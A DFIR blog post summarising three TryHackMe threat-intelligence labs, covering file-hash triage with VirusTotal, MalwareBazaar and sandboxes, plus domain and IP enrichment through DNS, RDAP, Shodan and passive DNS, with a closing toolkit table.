top of page

Threat Intelligence for Investigators — Practical Lessons from TryHackMe CTI Labs

  • Writer: DFIRHive
    DFIRHive
  • Oct 19
  • 9 min read

Updated: Oct 19


https://www.dfirhive.com/post/threat-intelligence-for-investigators-practical-lessons-from-tryhackme-cti-labs

When we’re in the middle of a live investigation, it’s never the full picture that lands first. We get fragments — a domain from proxy logs, a hash from memory, an IP address from firewall alerts.

On their own, these are just strings.

But once we start enriching them, they begin to tell a story — who registered that domain, what infrastructure sits behind that IP, what malware family that hash belongs to.

That’s what Threat Intelligence (CTI) does for DFIR. It’s the bridge between what you see on disk and what’s really happening outside your network.

Recently, I worked through a few TryHackMe rooms on CTI — Intro to Threat Intelligence, Domain & IP Threat Intelligence, and File & Hash Threat Intelligence.


They weren’t just exercises; they mirrored the same steps we take during live response.


Here’s how those lessons translate directly into day-to-day DFIR work.



You can find all three labs under TryHackMe’s Threat Intelligence track:





Understanding CTI in Action


CTI isn’t about collecting feeds — it’s about adding context. In forensic terms, it turns data into intelligence.


When a disk image gives us a list of suspicious IPs, CTI helps answer:

  • Who owns this IP?

  • Has it been seen in attacks before?

  • What kind of infrastructure is behind it?


When you pull a binary from /tmp/, CTI tells us:

  • What malware family it belongs to

  • Which C2 domains it contacts

  • Whether other analysts have seen it before


In short: Forensics shows the “what.” CTI helps explain the “why.”



Lab 1 — Intro to Threat Intelligence


When I started the Intro to Threat Intelligence lab, it felt theoretical at first — definitions, frameworks, and acronyms. But halfway through, it clicked. It wasn’t about memorizing terms — it was about learning to see context behind every incident.


From Data to Intelligence:


The lab began by breaking a simple hierarchy:

  • Data: Raw values like IPs or hashes.

  • Information: Structured and labeled — e.g., “this IP is a C2.”

  • Intelligence: Actionable — who owns it, how it behaves, and what to do about it.


That shift changed how I approached investigations. Instead of collecting endless data, I started asking: What does this actually tell me?


The CTI Lifecycle


The six stages — Direction, Collection, Processing, Analysis, Dissemination, and Feedback — sound textbook, but they’re what we unconsciously follow in every case.

Intelligence isn’t finished when you report it; it’s when others can use it.



Indicators and Behavior


The exercises highlighted the difference between IOCs, IOAs, and TTPs:


  • IOCs tell you what happened (hash, domain, IP).

  • IOAs show how it happened (execution, persistence).

  • TTPs explain why — the attacker’s behavior and strategy.


An example — a base64 PowerShell command — turned from a “malicious script” into mapped ATT&CK techniques:

  • T1059.001 — PowerShell Execution

  • T1105 — Ingress Tool Transfer


It shows how an IOC becomes real intelligence only when linked to behavior.


Structured Sharing

The lab also introduced STIX, TAXII, and TLP — standards that make intel shareable and consistent.


If you want to read about this lab, head over to official website --Read here


Lab 2 — File & Hash Threat Intelligence


If the first lab was about understanding what threat intelligence means, this one was about what it looks like in practice. The File and Hash Threat Intelligence room dives into the part of investigations where an alert turns into a binary — and our job is to decide if that file is bait, benign, or genuinely malicious.


The scenario was simple: an EDR flagged multiple binaries across endpoints during a normal sweep. The task was to triage them within an hour — verify, enrich, and decide. That single workflow — verify → enrich → decide — became the anchor of the lab.

Step 1: Filepaths Tell Stories


Before touching the file, the lab made you slow down and look at its name and location. A file’s path is often its first confession.

Pattern

Example

Why It Matters

Double extensions

invoice.pdf.exe

Hides executable intent from users.

System impersonation

scvhost.exe

Mimics Windows binaries to blend in.

Temporary storage

C:\Windows\Temp\

Used for ephemeral payloads.

Writable system paths

C:\ProgramData\

Persistence through easy access.

High entropy names

jh8F21.exe

Indicates automated packing.

Even without hashes, that’s already enough to decide if something deserves more attention.



Step 2: Hashing — Giving a File an Identity


The next step was generating file hashes — turning each binary into a unique fingerprint.


Commands used:

# Windows
certutil -hashfile bl0gger.exe SHA256
Get-FileHash -Algorithm SHA256 bl0gger.exe

# Linux
sha256sum bl0gger.exe

A few practical habits the lab reinforced:

  • Always store hashes in lowercase (avoids mismatches).

  • Hash both archives and extracted files — they may differ.

  • Even a one-byte change alters the hash completely.

  • Never record a hash without its source and timestamp.



Step 3: Enriching with VirusTotal


Once the SHA256 was ready, it was time to see what the rest of the world knew.

VirusTotal became a tactical CTI platform here — not just for verdicts, but for patterns.

The key things to check:

Section

What to Look For

Analyst Tip

Detection Score

How many vendors agree it’s malicious

Check again after 24 h — new detections roll in late.

Threat Labels

Family or capability tags (e.g., “RedLine Stealer”)

Conflicting names often mean early-stage malware.

Upload Time

When it was first submitted

Aged files with new hits can show resurgence.

Signatures & Certs

Valid or stolen certificates

Even signed binaries can be abused.

Relations

Linked IPs/domains

Pivot from these to find infra clusters.

Behavioral Tab

Registry edits, network calls

Correlate with endpoint logs before concluding.



Step 4: Cross-Referencing with MalwareBazaar


After VirusTotal, the lab introduced MalwareBazaar, which quickly became my favorite pivot source. It complements VT by providing deeper classification and campaign context.

A few use cases that stood out:

  • Family tagging: even low-detection samples can show strong ties (e.g., #IcedID, #QakBot).

  • YARA integration: ready-to-use detection rules for your EDR or SIEM.

  • Campaign attribution: tags like #TA551 help link your sample to a known actor.


The syntax was simple but powerful:

sha256:<file_hash>

Step 5: Sandboxing — Watching It Breathe


Static data tells you what the file is. Dynamic analysis tells you what it does.


The lab demonstrated sandboxing using Hybrid Analysis and Joe Sandbox — both safe, browser-based, and insightful.

  • Hybrid Analysis excels at behaviour trees and quick MITRE mappings.

  • Joe Sandbox dives deep — system calls, memory dumps, and reverse-engineering depth.


One test file scored 100/100 in HA — a clean confirmation that it was malicious. The heatmap showed ATT&CK techniques like process injection, persistence, and network beaconing — evidence you could directly feed into reports or hunt rules.



Step 6: Knowing the Limits


Sandboxes aren’t perfect. Some malware refuses to execute in virtual environments, delays payloads, encrypts traffic, or operates filelessly.

That’s where cross-referencing helps: compare sandbox data with logs, network captures, and hash intelligence.


Key Takeaways

  • Validate the exact binary before analysis.

  • Paths and filenames offer early heuristics.

  • Hash early — pivot confidently.

  • Use multiple sources (VT + MalwareBazaar) for enrichment.

  • Observe runtime behavior to confirm intent.

  • Always document findings with supporting evidence.



If you want to read about this lab, head over to official website --Read here


Lab 3 — Domain & IP Threat Intelligence


This room focused on one of the most common challenges in investigations — what to do when all we have is an IP address or domain in an alert. No hash, no process tree, just a line in a proxy log. It’s a scenario every analyst faces — and this lab taught how to take that raw indicator and turn it into a decision


Step 1 — Why It Matters


Domains and IPs are like fingerprints of infrastructure. They can belong to anything — a CDN edge node, a home router, or an attacker’s control panel. Without context, they tell nothing.

The lab showed how to build that context using a simple loop:

Verify → Enrich → Decide

Each step layers information until a picture forms.


Step 2 — Looking at Domains Through DNS


The first task began with DNS — the foundation of how domains live and move. Every time a user clicks a link, the system resolves a domain. That simple lookup carries a lot of forensic value.

The lab guided us through essential record types:

Record

What It Tells You

Why It Matters

A / AAAA

IP mappings

Rapid changes or multiple ASNs hint at flux or CDN abuse.

NS

Nameservers

Recently changed NS entries often mark new setups.

MX

Mail servers

Unusual MX on non-mail domains hints at phishing intent.

TXT

SPF / DKIM rules

Weak or missing SPF increases phishing likelihood.

SOA

Primary authority

Identifies administrative ownership.

TTL

Cache lifespan

Low TTLs suggest frequent rotation or short-lived infra.



Step 3 — Recognizing Attack Patterns


The lab broke down some tell-tale domain abuse patterns:

  • Fast Flux Hosting: Many IPs rotating fast across unrelated ASNs.

  • CDN Abuse: Looks similar to flux but stays within one major provider (e.g., Cloudflare).

  • Typosquatting: Fake brand lookalikes (paypa1[.]com, micros0ft[.]net).

  • IDN Spoofing: Unicode domains disguised as legitimate ones (e.g., xn--ppaypal-3ya[.]com).

Decoding these visually and contextually helps to spot when something’s designed to look safe.


Step 4 — IP Enrichment


When we have only IP address, the lab switched gears to RDAP — the most reliable source of ownership data. Unlike commercial GeoIP services, RDAP pulls data directly from the Regional Internet Registries (RIRs).


From RDAP, we captured:

  • NetRange: Scope of delegation

  • Organisation: Owner (hosting provider, ISP, etc.)

  • Abuse Contact: Where to report

  • Remarks: Clues on infrastructure type


This context was expanded with ASN and geolocation lookups using ipinfo.io and bgpview.io.


Step 5 — Service Fingerprinting with Shodan & Censys


Once ownership was known, the next question was what’s running there.

Using Shodan and Censys, we looked at:

  • Open ports and banners — early signs of exposure.

  • RDP/SSH on residential ASNs → likely a compromised endpoint.

  • TLS certificates — short validity, reused SANs, or self-signed certs often link to malicious infra.

By checking crt.sh or Censys, we could pivot on certificates — find clusters of domains using the same cert, uncovering full attacker networks.



Step 6 — Reputation & History


Next came reputation checks — understanding what the IP or domain has done over time.


We used:

  • VirusTotal: Detection ratios, relations, and first-seen timestamps.

  • Cisco Talos: Category labels (malware, spam, clean).

  • IP2Proxy: To flag VPN, proxy, or Tor exits.

  • Passive DNS: To visualize how the domain’s IPs changed over days or weeks.


This historical data gave one major insight — infrastructure is fluid .An IP used for phishing today might host a blog next week. Context in time matters as much as context in space.


A domain tells you where an attacker lives. An IP tells you how they operate. Together, they tell you when to act.

If you want to read about this lab, head over to official website --Read here


The Toolkit


Here are the tools I practiced with across all three CTI labs — and what each of them reveals during analysis:


Purpose

Tools & Links

What They Reveal / Why They Matter

DNS & Domain Resolution

DNS record analysis — A, MX, TXT, NS, SOA. Helps check propagation, TTL values, and DNS misconfigurations.

Ownership & Registration

Registrar info, creation dates, netblock, and abuse contacts — confirms whether the domain is legitimate, new, or disposable.

Network Context & AS Mapping

ASN, organization type (hosting, ISP, CDN), and geolocation. Useful for identifying shared infrastructure or malicious hosting clusters.

Reputation & Threat Feeds

Detection ratios, threat categories, blacklists, VPN/proxy indicators — quick validation of threat legitimacy.

Infrastructure History

Tracks DNS/IP changes, past infrastructure, historical web content — key for understanding domain age and activity timeline.

Certificates & Subdomains

SSL transparency logs, certificate reuse, subdomain discovery — helps identify clusters of related infrastructure.

Service Fingerprinting

Finds open ports, visible services, TLS banners, and versions. Great for spotting compromised servers or attacker infrastructure.

File Verification & Hashing

sha256sum · certutil · Get-FileHash

Computes MD5, SHA1, SHA256 hashes — establishes integrity and enables cross-platform correlation.

Malware & Hash Repositories

Stores malware samples, tags families, links campaigns, and provides IOC exports for detection tuning.

Dynamic Analysis / Sandboxes

Executes suspicious files in isolation to observe behavior — process trees, persistence actions, and network calls.

Static Analysis Utilities

strings · PEiD · ExifTool

Inspects binary metadata, embedded URLs, imports, and entropy — helps detect obfuscation and packers.

Network Behavior Tracking

Shows domain associations, WHOIS pivots, and observed connections — aids in infra clustering.

Visualization & Reporting

MISP · OpenCTI · Excel · Markdown Notes

For structured IOC storage, TLP tagging, and analyst documentation — makes enrichment traceable and reusable.


Wrapping It Up


What these three labs did beautifully was turn abstract “intel” into investigative muscle memory. They weren’t about memorizing platforms — they were about building a habit of asking better questions.

Now, whenever I see an IOC, my brain automatically runs through:

“Where did it come from? Who owns it? What else connects to it?

Each question narrows the noise and moves us closer to the narrative behind the attack.





Comments


  • Instagram
  • Facebook
  • Twitter
  • LinkedIn
  • Discord
bottom of page